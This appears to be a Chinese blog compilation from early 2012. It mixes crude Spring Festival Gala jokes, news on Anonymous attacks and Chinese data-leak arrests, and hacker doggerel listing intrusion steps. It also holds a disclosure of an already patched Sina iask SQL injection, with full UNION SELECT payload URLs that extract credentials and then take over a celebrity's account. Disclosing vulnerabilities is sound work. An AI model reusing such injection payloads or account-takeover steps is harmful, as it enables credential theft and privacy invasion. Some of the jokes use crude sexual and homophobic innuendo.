分类 精彩分享 下的文章

1、原来李婶是小内啊。。。



2.我擦,这不山形健老师么。。。



3. 春晚主持人阵容:一对鸳鸯一对基...三个小受一个T...一个腐女看三P……



4.董卿语录:毕老师跟叔叔干上了。。。



5.董卿语录:毕老师您从哪漏出来的。。。



6.有多少人算不明白厨子是赚了赔了!!!



7.好想看我们山大教授毕老师在电视机前突然大喊一句“凡我在处,便是山大!”…然后画面一转响起“我们向往大啊啊~啊海…!



8.一年一度的年终吐槽大会开始啦!



9.春晚就是中老年人网络词语学习成果展。。。



10.春晚很好地驗證了熵增大是自然規律……



11.当搞基成为一种趋势,连春晚也逃脱不了。。。



12.蔡明一边说着:"肿么了?",一边用双腿紧紧夹住一根粗大笤帚,配合她的白色假发和少女萌音,整个画面有一种诡异的美感。。。。



13.龙是雄的,凤也是雄的,凰才是雌的…………春晚你要搞什么…………



14.力宏是不是电吉他没开。。。



15.还是我们家力宏帅;坤爷帅爆了;eason!eason!邵峰好有型啊;我看到庚庚了!!!忘了费翔了。。。



16.这个舞蹈是一个白富美和高帅富调情,而屌丝跪一地的剧情啊!!



17.春晚看到现在,作为一个党性丰满的掉一地的优秀选手,我看到了,基,本国策。



18.宋国母的绝唱啊,下一届春晚的国母就姓彭了。



19.皇上这场戏不拍完,全都不用吃饭!!!谁吃谁用葵花点穴手点上!!!



20.报告孔庆东,开场曲有一对王八蛋不唱普通话。。。



21. 犯历史错误了啊,“太监”这个词在明代才开始有的!他应该说扮的是“宦官”。



22.春晚明年应该考虑在后面大屏幕上来个人人状态墙嘛!



23.刚看完李云迪和王力宏眉来眼去 李咏和朱军又腻腻歪歪 今年的主题是?” “今年的主题:龙阳”



24.总是担心山形老湿会去脱董卿衣服。



25. 老湿,我明白了,我不是一只鸡啊。——我说过你是吗?



26.把荆轲端上来以后,啊,啊,啊,啊,啊。。。



27.今年春晚好奇葩啊,演电视剧的去唱歌了,唱歌的去说相声了,说相声的去演小品了,演小品的不来春晚了。。。



28. 春晚没有广告所以是连续的。。。然后。。。它可基(积)



29.半根黄瓜?还有半根呢? 对不起...老公....昨晚你不在啊....



30.CCTV基因突变史:CCTV →_→ CCAV →_→ CCGV



31.咖啡就着大蒜,看春晚配着人人评论,岂不快哉!



33.今天的四位男主持李咏,朱军,撒贝宁,毕福剑,四人的名字组合起来是LZSB...笑死我了。。。



34.插播一条,美国海军卡尔文森航母战斗群上起飞的战斗机当地时间17时许袭击了伊朗在霍尔木兹海峡附近的海军基地,击沉15艘伊朗海军军舰,美国白宫目前正在召开记者会,宣布美国正式向伊朗开战。(他就是个状态)



35.你们有没有发现问题的严重性!他们还没有发来贺电!!!



36.连李玉刚的胸都比我大……我不活了,你们别拦着我……



37.表演成功完成后,刘谦正对镜卸妆,镜中忽然伸出一只手轻抚他的脸,一个邪魅低沉的声音响起“谦儿,答应你的我都做到了,现在,是你回报时候了……”



38.我觉得吧,最近状态都开始转向巴神了。。。



39.我看着春晚老觉得他们有基情,特别是孔雀舞,公孔雀才有尾巴,两只有尾巴的公孔雀亲来亲去……



40.姑亮们,零点之前把bra脱了,保证明年没有凶兆啊!!



41. 奥巴马正在看春晚直播,美国中情局头头突然闯进来,递上一份绝密情报:据中国网民线报,我国已对伊朗宣战



42.据说那个女的穿bra了,是肉色的。。。



43.费翔——那些年,咱妈一起追过的男孩!



44.本山大叔不来春晚外边放鞭炮的时间明显不整齐了……



45.“我们俩谁甜!”“你甜!”“为什么?”“她糖尿病!”。。。我擦。。。冯巩这都能知道味道,太重口味了。。。看了十八年春晚,这是最重的一条啊。。。信息量太大了~!!!



46为了配合整个春晚的“基”调,刘谦开始“搞玻璃”。。。



47.还说 春晚没广告 刘谦变了个苹果 还咬了一口。。。



48.刘谦,你敢把你背后的容嬷嬷变成夏雨荷咩?



49我要被央视雷死了!!!!!刚才看新闻,介绍春晚时是这样说的“今年春晚的另一大看点是出现了不少夫妻档,胡军夫妇,羽泉夫妇,沙溢夫妇等”。。。好像有哪里不对啊!!!!!!!!



50.台下坐着的是“低笑点比赛”的全国百强吗……



51.毕老师说,我俩往这一站,舞蹈名就出来了…………凌辱素人.rmvb



52.各位注意到没,刚才李咏用猥琐的小眼神儿瞄着朱军,不一会儿,老毕也偷偷猥琐的瞄着朱军!



53.明星家庭联唱,敢不敢喊彭丽媛和她老公唱一个-_-



54.李咏!放开那群正太萝莉!



55.那未来的儿子,在舞台上掉了100块钱,谁捡到了



56.主持人让我想到一部电影:三渣叔之恋。。。



57.距离下一春晚倒计时还有365天



58.刘谦说镜子里是他朋友,于是出来一只手。。。这只手是怎么成为他朋友的呢?



59.屌丝们普遍对刘谦的镜子很感兴趣,表示一定要弄一个。



60.主持人没说明年再见、、、



61.“董卿小姐,坚硬么?” “恩,坚硬”  “你要我从哪个地方穿进去?”  “中间吧” ==“刘谦再来一次吧,你太棒了!一年不见你的手越来越灵活了。。。”What a fucking day!



62.从瞿颖到周迅再到王菲,跟了李亚鹏嗓子都变哑了,真是一代猛男啊!



63.迟早有一天陈坤的左眉毛会抛弃他的右眉毛冲向宇宙。。。



64.【﹁_﹂】【﹁_﹂】【﹁_﹂】【﹁_﹂】【﹁_﹂】【﹁_﹂】看懂的自觉转



65. 刘谦:“你觉得这颗球在哪里?” 沙溢:“在杯子里。” 刘谦:“你以为它在杯子里,其实它在衣服兜里;你觉得他在衣服兜里,其实它现在在我手里;你认为它在我手里,其实它现在在杯子里,现在把这颗球扔掉。。。。哔里巴拉哔里巴拉哔里巴拉!@¥!@#%……”“葵花点穴手!!!!”世界安静了。



66. 个人觉得今晚最佳的一条状态:杨丽萍表演孔雀舞,这时背景音如果出现赵忠祥浑厚的声音:“每年这个时候就是孔雀交配的季节。”就完美了。



67.原来刘谦在董卿不在的这两年里都是靠镜子!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!



68。2012年中央电视台春节联欢晚会:类型:科幻/犯罪/悬疑/恐怖/灾难/鬼怪/同性......................制片国家/地区:大陆......................语言:汉语普通话......................上映日期:2012.1.22



69.老听着是容嬷嬷协全国炮友给大家拜年……



70.我扫了一个月的黄,终于把你们这俩搞基的扫出来了



71.别说了,给跪了:刘谦能把黄变红,能把黑变粉吗



72.看了吧!一对基遇到正室老婆的结果…居然有一个要扮儿子= =



73.av女优说:我是搞人体体液收集分离刺激新陈代谢研究的



74. 春晚要配套看人人上的各种评论才好看 。。。



75.根据王菲2011年5月28号那条微博推算出王菲如果28天一周期的话。。。。。怪不得老是跑。。。



76.郭冬临叫“好的受“了



77。阴谋:今年的春晚不断的通过各种语言、行为和舞蹈暗示搅基,最后让李玉刚出现来彻底扭转直男的世界观,借此完成下一个五年的计划生育工作……



78.淘宝虽好,可不要多上哦,亲!

北京时间1月20日消息,据国外媒体报道,美国司法部关闭文件分享网站Megaupload之后,黑客组织Anonymous开始攻击一些大公司与美国政府机构的网站以示报复。



  今天早些时候,Anonymous通过其Twitter主帐户散布了一系列反对SOPA(《停止在线盗版法案》)与PIPA(《知识产权保护法案》)的言论,声称:“既然政府关闭了Megaupload,我们也能在15分钟内关闭政府和唱片公司的网站。走着瞧!”



  此外,Anonymous还宣称对环球唱片(Universal Music)、美国唱片业协会(RIAA)、美国电影协会(MPAA)与美国司法部网站遭到的袭击负责。截至美国太平洋时间下午3点,以上网站依然没有恢复正常,但是有人在Twitter上称它们将慢慢陆续复原。



  该组织还声称,本次攻击行动是“Anonymous有史以来规模最大的攻击”,有5635人参与。本次行动目前仍在进行中,Anonymous扬言称下一个目标是美国联邦调查局(FBI)的网站:“请准备好爆米花……今晚的好戏长着呢。”(悠拉)

进谷歌 找注入                         弄小站 挺辛苦
没注入 就旁注                         搞大站 更没谱
没旁注 用Oday                         日不下 找楼主
没Oday 猜目录                         日不下 找楼主
没目录 就嗅探                         求0day 需帮助
没嗅探 去跳楼                         楼主曰 得好处
没死掉 就继续                         我说行 咱五五
爆账户 找后台                         楼主猛 通门路
传小马 放大马                         有0day 还热乎
拿权限 挂页面                         搞一宿 没侵入
放暗链 清数据                         我不解 问缘故
清日志 留后门                        “艹他马 洞已补!”

T00ls.Net长期被DDOS、CC,服务器不堪重负,现暂时关闭网站,希望未来或能解决此问题:



① 若有发展或指导性建议,请邮件或者微博联系管理员,但或不予以直接答复,请谅解。

② 重新开放时间请关注微博或者本站点,感谢大家长期以来对T00ls支持。

③ 感谢DDOSer们对T00ls的热爱,T00ls会因你们而进步。



1.jpg

记者1月10日从国家互联网信息办获悉,近期一些媒体报道或在网上流传的数家网站用户信息被泄露的事件,引起互联网管理部门的高度重视。目前,相关事实已由公安机关查明,违法人员已经或将要被依法严肃查处。

  据这位发言人介绍,近期查处的信息泄露事件主要有五个。

  一是CSDN、天涯网站被入侵事件。经查,这两家网站曾在2009年以前被入侵,数据遭泄露也发生在两年前,近期这两家网站并未遭受攻击。网名“臭小
子”的许某某(男,19岁,无业人员)出于个人炫耀的目的,于去年12月4日在乌云网上发帖称CSDN等网站数据密码被泄露,并公布泄露的数据包截图。现
许某某已被公安机关予以训诫。公安机关对这两家网站遭入侵事正在溯源追查。

  二是网上流传的京东商城网站被入侵事。经查,这个网站确遭入侵但数据未被泄露。网名“我心飞翔”的犯罪嫌疑人要某(男,35岁,陕西省咸阳市某制药厂
员工)于2011年4月发现京东商城网站存在安全漏洞,当年12月29日在乌云网上发帖称掌握京东商城漏洞,以公布该安全漏洞要挟京东商城向其支付270
万元。京东商城网站未予支付,要某也并未窃取、泄露该网站相关数据。要某因涉嫌敲诈勒索,现已被依法刑事拘留。

  三是“YY”语音聊天网站泄露数据事。经查,广东“YY”语音聊天网站泄露的数据,系该公司员工利用职务之便从公司内部备份数据库窃取的。该网站并未被入侵。此事正在处理之中。

  四是网上流传的工商银行等金融机构数据泄露事。经有关部门对工商银行、民生银行、交通银行调查,证实其系统并未被入侵,网上公布的所谓“数据”与银行
相关数据不符。网名“挨踢客”的王某某(男,24岁)从事网络推广工作,为了提高自己所在网站的知名度和自我炒作,于2011年12月28日在其个人的挨
踢客网站和微博上凭空捏造,发布所谓工商银行等网站用户数据泄露的信息,王某某已被公安机关予以训诫。五是网上流传的新浪微博、当当网等网站被攻击事。经
查,新浪微博、开心网、7K7K网站、当当网、凡客诚品等网站均未被入侵。网上公布的上述网站部分账号密码系有人利用网络远程大规模猜测密码所破解,实施
密码破解的人员身份目前已被锁定,公安机关正在实施抓捕。

  截至目前,公安机关此次已查处入侵、窃取、倒卖数据案件9起,编造并炒作信息泄露案件3起,刑事拘留4人,予以治安处罚8人。

  国家互联网信息办发言人表示,从上述案例可以看到一些人编造或炒作网站用户信息被大规模泄露的消息,既有出于个人进行炫耀或骗取钱财的目的,也有一些
网络安全公司销售人员想以此提高知名度、推销自己的产品,还有个别人借机企图干扰和贬损北京等城市正在开展的微博客用户用真实身份信息注册工作。

  他指出,国家互联网信息办公室、工信部和公安部等有关部门对非法入侵网站泄露数据信息的犯罪行为予以强烈谴责,并将依法严惩;对编造散布谣言的行为予
以谴责和查处。有关部门将继续采取有效措施,保护公民个人身份信息安全。公安机关将严厉打击非法入侵网站泄露数据信息的行为以及捏造事实、编造和传播谣言
的行为,并依法查处相关人员。各网站必须进一步建立健全用户信息安全管理制度,强化工作人员信息安全意识,严禁泄露用户信息,提高反病毒、反黑客能力,确
保用户信息安全。

CSDN“泄密门”两名黑客已经落网

昨天,几乎让互联网裸奔的“CSDN泄密门”事件传出最新消息,两名涉案黑客已经被抓,还有部分人员尚未落网。

日前,CSDN网站数据库遭黑客入侵,600万用户注册邮箱和密码被泄露。此后人人网、天涯社区、百合网等众多知名网站数千万网友个人信息相继被泄露,更有人将其做成压缩包,上传至网络供人下载。国内网站纷纷“沦陷”,大有“裸奔”之势。

记者昨日联系到北京市公安局外宣处,工作人员表示,目前已有两名涉案黑客被抓,由于部分涉案人员没有归案,具体案情尚不便向外界透露。北京市公安局外宣处相关负责人员告诉记者,此次泄密与实名制无关。

摘自:雅虎新闻   

    正义网浙江1月4日电(通讯员 王红)只因“个人兴趣”,19岁的李胖胖利用木马程序非法侵入公安局网站服务器,获取他人计算机控制权。2011年12月28日,浙江省台州市椒江区检察院以非法控制计算机信息系统罪对李胖胖提起公诉。据悉,这是浙江省检察机关首次起诉这一罪名的案件。

    据了解,1992年4月出生的李胖胖是贵州省遵义人,初中文化。2009年,李胖胖开始接触互联网,通过在QQ群和网上论坛的学习,掌握了网络攻击、网络漏洞扫描等黑客软件的使用方法。2011年2月开始,李胖胖在互联网上用软件随机扫描服务器漏洞,并通过软件自动建立新的用户名和密码,从而获取服务器的控制权。

    李胖胖交代,自己控制别人的计算机,完全是出于个人兴趣,并不是为了赚钱。得到服务器控制权后,他就到QQ群里叫卖,每个只卖5元到25元不等。

    2011年2月5日,李胖胖侵入并控制了“台州市网上公安局”网站服务器。3月15日,台州市公安局公共信息网络安全监察队工作人员在维护服务器时,发现有黑客侵入的痕迹和非法木马文件,可能对业务造成重大影响。工作人员通过技术侦查,锁定了犯罪嫌疑人李胖胖,随即报案。9月22日,李胖胖在遵义家中被警方抓获。经查,他共非法控制了包括台州市公安局网站服务器在内的34台服务器。

    据办案检察官介绍,非法控制计算机信息系统罪是根据刑法修正案(七)修改的新罪名。根据全国人大法工委刑法室对于该罪的释义,所谓的侵入是指未经授权或者他人同意,通过技术手段进入计算机信息系统。非法控制是指通过各种技术手段,使得他人的计算机信息系统处于掌控之中,能够接受其发出的命令。李胖胖利用木马程序非法侵入他人计算机服务器,符合这一罪名的构成要件。另外,“两高”出台的关于办理危害计算机信息系统安全刑事案件的相关司法解释规定,非法获取计算机信息系统数据或者非法控制计算机信息系统,非法控制计算机信息系统20台以上的,属于情节严重。李胖胖非法控制他人计算机服务器34台,已属于情节严重。



各位  兴趣归兴趣    玩玩就够了  我们都懂的~~

看到 公安的服务器还是乖点---------

相关厂商:www.sina.com

作者:http://weibo.com/evilniang

发现时间:2012-1-1

漏洞类型:sql注射

危害等级:高

漏洞状态:已修复



首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。



新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。



漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9



漏洞利用方式:



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。



直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867







直接构造地址



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



直接获得刘谦的账号和密码







这里账号是luchenmagic密码为2lo*****(保密)



尝试登陆







成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。



接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。



后话:



1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。



2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?



3.网络泄密涉及到太多。不管是普通网民,还是明星名人,都被牵涉进来。这里测试不少明星,基本上都能通过微薄获取他们的私人信息,甚至登陆他们的msn。(香港爆料杂志来找我把。开个玩笑。。。)



4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。(我是无私奉献白帽子,被活雷锋了。)



5.祝新年快乐。

----------------------------------------------------

游侠补充:

  刚从流量统计系统看到阅读者暴增,原来是文中例子的主角刘谦先生在微博发了一条……好吧:这个事情,仅仅是刘谦先生的粉丝在做个安全测试,并无恶意。我们都喜欢刘先生的魔术。

  谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱! :)

  另:文章是新浪打了补丁之后作者才发出来的,看到本文的时候还想测试的话……晚了。嘿嘿

“我自己做信息安全的,没有开网银,从没在网上进行出入境申请,从来不在网上支付东西,网络购物也从不自己下单,都是通过朋友的支付系统操作,让自己逃离那个环境。”市政协委员、广东南方信息安全产业基地有限公司董事长宋国琴的保守行为让记者大吃一惊。“在这个业界,了解得多,忧虑就会多些,于是行为就趋于保守,”宋国琴笑言,“这不是好事情,不值得推荐”。

  连日来,国内多个知名商业网站、政务网站相继陷入“泄密门”,数千万的用户信息被泄露,在数以亿计的网民们中引发震动和不安。网络信息安全到底问题出在哪?网民们该如何保护自己的信息安全?昨日,市政协会议开幕之际,宋国琴接受本报记者专访,向广大网民支招。

  宋国琴表示,网络技术是近几十年的爆炸性革命,发展到今天,引发的网络信息安全问题是必然的。前段时间,国外的银行也曾发生过数千万客户信息泄露的问题。所以,这是一个国际的共性问题。

  互联网在中国起步较晚,国内在管理、规范等方面跟其他国家有差距,有一个日渐完善的过程。中国的互联网用户基数特别大,信息安全管理的难度就更大。“这是一个客观存在的巨大的问题。”

  “信息技术发展到比较高端的一定是密码技术的运用。”宋国琴解释说,这个密码技术不是大家在网站注册时设置的密码,“那个6~8位数的英文或数字的设置只是个初级编码,无论怎么不规律,对于专业技术人员来说,几十秒钟就可以破译。”

  宋国琴介绍,通过密码技术对个人的商务资料、个人信息、隐私文件等进行加密处理。她打了个比方:“这个密码技术就如银行的保险箱,对客户放在其中的东西进行加密,如果被盗,别人只能得到这个保险箱,却无法取得里面的东西。”目前,密码技术的运用不够广泛,如果以密码技术为核心的信息安全技术能够大量运用的话,陈冠希、张柏芝的“艳照门”事件也就不会发生了。

  建议警方指引网民

  “网络上暴民和良民混淆在一起,让我害怕。”虚拟社会的管理机制缺失,宋国琴坦陈自己“对网络有戒心,不太习惯过于依赖网络”。宋国琴指出,“下一步,国家有可能对互联网进行身份认证。不一定是实名制,但是是身份认证,这是一个趋势。”

  宋国琴认为,要解决互联网安全问题,最核心的是要攻克海量身份识别技术。而从管理层面来说,要承认目前的管理环境和管理技术还不够完善。公安系统应给网民提供一些技术支持、引导,局部解决一些问题。比如:推荐市民采用一些带有密码技术的软件,对自己电脑里的重要资料和文件进行保护;如何识别钓鱼网站,有木马程序的网站等。她打算进行一个详细的调研,并形成提案交给公安部门和执法部门。

  专家提醒网民:

  开网页先看审核认证码

  普通市民的信息安全技术和知识十分有限,他们在日常上网操作时该如何保护自己的信息安全?宋国琴建议,市民可以购买具有PC文件柜、文件锁功能的软件产品,对个人的商务资料、个人信息、隐私文件等进行加密,即使被盗了,别人看到的也只是一堆乱码。宋国琴指出,作为网络运营商、技术服务提供商,更应该通过密码技术的运用,提高所提供平台的安全性,给客户构筑一个安全的网络使用、交易环境。

  不断有网友反映,收到QQ抽奖的页面链接。宋国琴表示,这都是假的,轻易进行下一步操作,会导致钱财损失。她建议网友打开网站首页时,首先页面最下方,如果有一连串审核认证号码、备案号码,表明这个网站的域名是在公安等相关部门注册了的,是正规网站。

  链接:近期网络安全事件

  去年12月22日,CSDN网站承认安全系统遭到黑客攻击,数据库中超过600万用户的登录名和密码泄露。当月26日,天涯网证实用户密码遭到泄露。当月29日上午,有网友称广东省公安厅出入境政务服务网网站后台存在漏洞。广东省公安厅随后承认,该网站确实存在技术漏洞,现已修补完毕。